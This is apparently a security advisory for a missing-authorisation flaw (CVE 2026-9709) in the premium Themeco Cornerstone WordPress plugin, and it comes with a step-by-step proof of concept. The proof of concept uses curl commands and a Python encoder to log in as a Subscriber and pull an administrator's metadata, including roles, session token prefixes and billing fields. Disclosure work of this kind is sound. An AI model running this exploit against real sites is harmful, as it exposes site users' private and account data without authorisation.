Themeco Cornerstone < 7.8.9 (Premium, bundled with X Theme) – Subscriber+ Arbitrary User Meta Disclosure | CVE 2026-9709

Description

The plugin does not enforce capability checks on one of its REST API routes, allowing any authenticated user to disclose the metadata of any other user, including roles, session token previews and stored billing/shipping fields. This affects the premium Themeco Cornerstone page builder distributed bundled with the X Theme, not the unrelated free `cornerstone` plugin (v0.8.x) on the .org repository.

Proof of Concept

Prerequisites:
- Active Cornerstone plugin (bundled with the X Theme) on the target site.
- Any user account with a role from Subscriber upward.

Steps to reproduce:

1) Authenticate as a Subscriber and acquire the standard WP REST nonce:

   curl -sk -c jar -b jar -X POST "https://TARGET/wp-login.php" \
     --data-urlencode "log=subscriber" \
     --data-urlencode "pwd=PASSWORD" \
     --data-urlencode "wp-submit=Log In" \
     --data-urlencode "redirect_to=https://TARGET/wp-admin/" \
     --data-urlencode "testcookie=1" -o /dev/null

   NONCE=$(curl -sk -b jar "https://TARGET/wp-admin/admin-ajax.php?action=rest-nonce")

2) Build the gzip+base64-encoded payload targeting the administrator (user_id=1):

   PAYLOAD=$(python3 -c 'import gzip,base64,json;print(base64.b64encode(gzip.compress(json.dumps({"type":"usermeta","context":{"user":"1"}},separators=(",",":")).encode())).decode())')

3) Send the request:

   curl -sk -b jar -H "X-WP-Nonce: $NONCE" \
     -G "https://TARGET/wp-json/themeco/data/dynamic-choices" \
     --data-urlencode "gzip=1" --data-urlencode "request=$PAYLOAD"

4) The response `data` field is itself gzip+base64-encoded. Decode it:

   python3 -c 'import sys,json,base64,zlib;d=json.load(sys.stdin);print(zlib.decompress(base64.b64decode(d["data"])).decode())'

Expected result: a JSON array of the target user's metadata, with each value truncated to ~55 characters. Sensitive entries observed include `wp_capabilities` (full role serialization, e.g. `a:1:{s:13:"administrator";b:1;}`), `wp_user_level`, `session_tokens` (truncated session hash prefix), and any WooCommerce billing/shipping fields stored on the user.